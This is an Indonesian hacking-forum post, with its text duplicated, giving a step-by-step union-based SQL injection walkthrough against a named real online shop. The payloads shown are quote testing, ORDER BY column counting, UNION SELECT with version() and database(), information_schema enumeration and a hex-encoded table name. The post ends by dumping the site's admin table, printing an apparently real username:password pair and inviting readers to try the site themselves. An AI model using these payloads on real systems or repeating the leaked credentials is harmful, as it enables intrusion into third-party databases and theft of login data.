Pencarian
Latest topics
iseng om dengan SQL Injection ^_^
Halaman 1 dari 1
iseng om dengan SQL Injection ^_^
oke om.. langsung saja
====[1]====
saia dapet taget [You must be registered and logged in to see this link.]
====[2]====
biar tau target tsb bisadi injek ato ga kita tambah kan karakter ' (koma atas) di depan tanda =ato stelah angka, misal jadinya [You must be registered and logged in to see this link.]
jika muncul pesan eror seperti "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"
maka targetdapat di inject
====[3]====
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
bgini om:
[You must be registered and logged in to see this link.]
lalu cek terus om
[You must be registered and logged in to see this link.]
sampe
[You must be registered and logged in to see this link.]
sampek muncul pesan error...
misal:
[You must be registered and logged in to see this link.]
muncul "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"
nah, berarti yang kita ambil angka 26
====[4]====
untuk mengeluarkan angka ajaib (istilah gaul.e om ) berapa yang muncul gunakan perintah union
karena tadi error sampai angka 27
gunakan perintah : +and+1=2+union+select+
sehingga sampe 26 saja, liat:
[You must be registered and logged in to see this link.]
taraa... muncul angka 3
lalu coba injek pada angka tsb dengan perntah
version() utk untuk mengecek versi sql yg dipakai
user() untuk mengetahui nama user
database() untuk mengetahui nama database
kita coba menggunakan perintah version() untk melihat versi sql web target
liat:
[You must be registered and logged in to see this link.]
yes, muncul 5.0.51a-3ubuntu5.8 (versi 5)
jika versi 4.x.x.xx tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah +from+information_schema
untuk versi 5.x.x.xx berarti anda beruntung tidak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah +from+information_schema
====[5]====
Untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) ---> dimasukan pada angka yg keluar tadi dan
perintah +from+information_schema.tables+where+table_schema=database()---> dimasukan setelah angka terakhir
liat:
[You must be registered and logged in to see this link.]
muncul ini
admin,cart,categories,class,corporate_sale,countries,customers,customorder,flash,gifting_cards,gifting_config,gifting_winner, bla...bla....bla....
kita cari table yang kira kira berisi username dan password web tersebut
misal.e user, usr, username, user_name, login, user_admin, name, admin_user, dll...
dn kebetulan pada web target kita itu terdapat table dengan nama "admin"
kita ubah dulu nama table yang mau di liat isi tablenya dengan tool ini [You must be registered and logged in to see this link.]
dan hasil dari konvert kata admin yaitu 61:64:6d:69:6e
hilangkan tanda titik duanya menjadi 61646d696e
====[6]====
Mencari isi table
Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah : +from+information_schema.columns+where+table_name=0xhexa-- ===> dimasukkan diangka terakhir
ganti hexa dengan kata admin yg sudah di convert ke hexa
liat:
[You must be registered and logged in to see this link.]
dan muncul isi table tsb adalah
id,userName,password,status
====[7]====
untuk melihat isi dari column userName,password
gunakan perintah : concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah: +from+(nama table berasal) -> dimasukan setelah angka terakhir
NB : 0x3a adalah tanda : (titik dua)
liat:
[You must be registered and logged in to see this link.]
tereeeng muncul deh username ama passwordnya
56hgYTOI7%&j@:7YyYtk%n0@h&Di (username dan password dibatasi tanda titik dua)
====[8]====
langkah terakhir adalah mencari halaman login admin web tersebut,
om bisa menggunakan tools admin finder pada tahap ini
NB : kadang kadang, ada username dan pasword yang encrypt. maka om bisa menggunakan tools juga
====[selesai]====
ini luh om scrinchotnya, yang belum di erbaiki setalah ane eksekusi, nama ane masi ada
[You must be registered and logged in to see this image.]
dan ini
[You must be registered and logged in to see this image.]
oh iya cek TKP aja lansung om di [You must be registered and logged in to see this link.] munkin aemasi belum di perbaiki
monggo nyoba,semoga tutorial ini berguna untuk pembelajaran. penulis tidak bertanggung jawab atas kerusakan yang anda perbuat
====[1]====
saia dapet taget [You must be registered and logged in to see this link.]
====[2]====
biar tau target tsb bisadi injek ato ga kita tambah kan karakter ' (koma atas) di depan tanda =ato stelah angka, misal jadinya [You must be registered and logged in to see this link.]
jika muncul pesan eror seperti "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"
maka targetdapat di inject
====[3]====
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
bgini om:
[You must be registered and logged in to see this link.]
lalu cek terus om
[You must be registered and logged in to see this link.]
sampe
[You must be registered and logged in to see this link.]
sampek muncul pesan error...
misal:
[You must be registered and logged in to see this link.]
muncul "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/nowtees.com/httpdocs/cat.php on line 14"
nah, berarti yang kita ambil angka 26
====[4]====
untuk mengeluarkan angka ajaib (istilah gaul.e om ) berapa yang muncul gunakan perintah union
karena tadi error sampai angka 27
gunakan perintah : +and+1=2+union+select+
sehingga sampe 26 saja, liat:
[You must be registered and logged in to see this link.]
taraa... muncul angka 3
lalu coba injek pada angka tsb dengan perntah
version() utk untuk mengecek versi sql yg dipakai
user() untuk mengetahui nama user
database() untuk mengetahui nama database
kita coba menggunakan perintah version() untk melihat versi sql web target
liat:
[You must be registered and logged in to see this link.]
yes, muncul 5.0.51a-3ubuntu5.8 (versi 5)
jika versi 4.x.x.xx tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah +from+information_schema
untuk versi 5.x.x.xx berarti anda beruntung tidak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah +from+information_schema
====[5]====
Untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) ---> dimasukan pada angka yg keluar tadi dan
perintah +from+information_schema.tables+where+table_schema=database()---> dimasukan setelah angka terakhir
liat:
[You must be registered and logged in to see this link.]
muncul ini
admin,cart,categories,class,corporate_sale,countries,customers,customorder,flash,gifting_cards,gifting_config,gifting_winner, bla...bla....bla....
kita cari table yang kira kira berisi username dan password web tersebut
misal.e user, usr, username, user_name, login, user_admin, name, admin_user, dll...
dn kebetulan pada web target kita itu terdapat table dengan nama "admin"
kita ubah dulu nama table yang mau di liat isi tablenya dengan tool ini [You must be registered and logged in to see this link.]
dan hasil dari konvert kata admin yaitu 61:64:6d:69:6e
hilangkan tanda titik duanya menjadi 61646d696e
====[6]====
Mencari isi table
Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah : +from+information_schema.columns+where+table_name=0xhexa-- ===> dimasukkan diangka terakhir
ganti hexa dengan kata admin yg sudah di convert ke hexa
liat:
[You must be registered and logged in to see this link.]
dan muncul isi table tsb adalah
id,userName,password,status
====[7]====
untuk melihat isi dari column userName,password
gunakan perintah : concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah: +from+(nama table berasal) -> dimasukan setelah angka terakhir
NB : 0x3a adalah tanda : (titik dua)
liat:
[You must be registered and logged in to see this link.]
tereeeng muncul deh username ama passwordnya
56hgYTOI7%&j@:7YyYtk%n0@h&Di (username dan password dibatasi tanda titik dua)
====[8]====
langkah terakhir adalah mencari halaman login admin web tersebut,
om bisa menggunakan tools admin finder pada tahap ini
NB : kadang kadang, ada username dan pasword yang encrypt. maka om bisa menggunakan tools juga
====[selesai]====
ini luh om scrinchotnya, yang belum di erbaiki setalah ane eksekusi, nama ane masi ada
[You must be registered and logged in to see this image.]
dan ini
[You must be registered and logged in to see this image.]
oh iya cek TKP aja lansung om di [You must be registered and logged in to see this link.] munkin aemasi belum di perbaiki
monggo nyoba,semoga tutorial ini berguna untuk pembelajaran. penulis tidak bertanggung jawab atas kerusakan yang anda perbuat
areg_noid- Jumlah posting : 22
Join date : 16.12.10
Age : 31
Lokasi : Sidoarjo
Halaman 1 dari 1
Permissions in this forum:
Anda tidak dapat menjawab topik
|
|
Sun Feb 26, 2012 8:04 pm by kobe
» salam kenal
Mon Oct 31, 2011 11:19 am by kobe
» Avacs Live chat
Sun Oct 16, 2011 3:18 am by sikancil83
» deface lagi...deface.. lagi... bosen...
Sat Sep 24, 2011 4:30 pm by areg_noid
» wew.... muantaff gan
Sat Sep 24, 2011 4:25 pm by areg_noid
» link kgb archver
Sun Jul 24, 2011 5:22 pm by areg_noid
» be carefully !! virus on the linux.
Wed Apr 20, 2011 9:28 pm by areg_noid
» Tugas akhir Network Simulator-2
Fri Mar 25, 2011 2:01 am by mr.onang
» iseng om dengan SQL Injection ^_^
Sat Feb 26, 2011 5:59 pm by areg_noid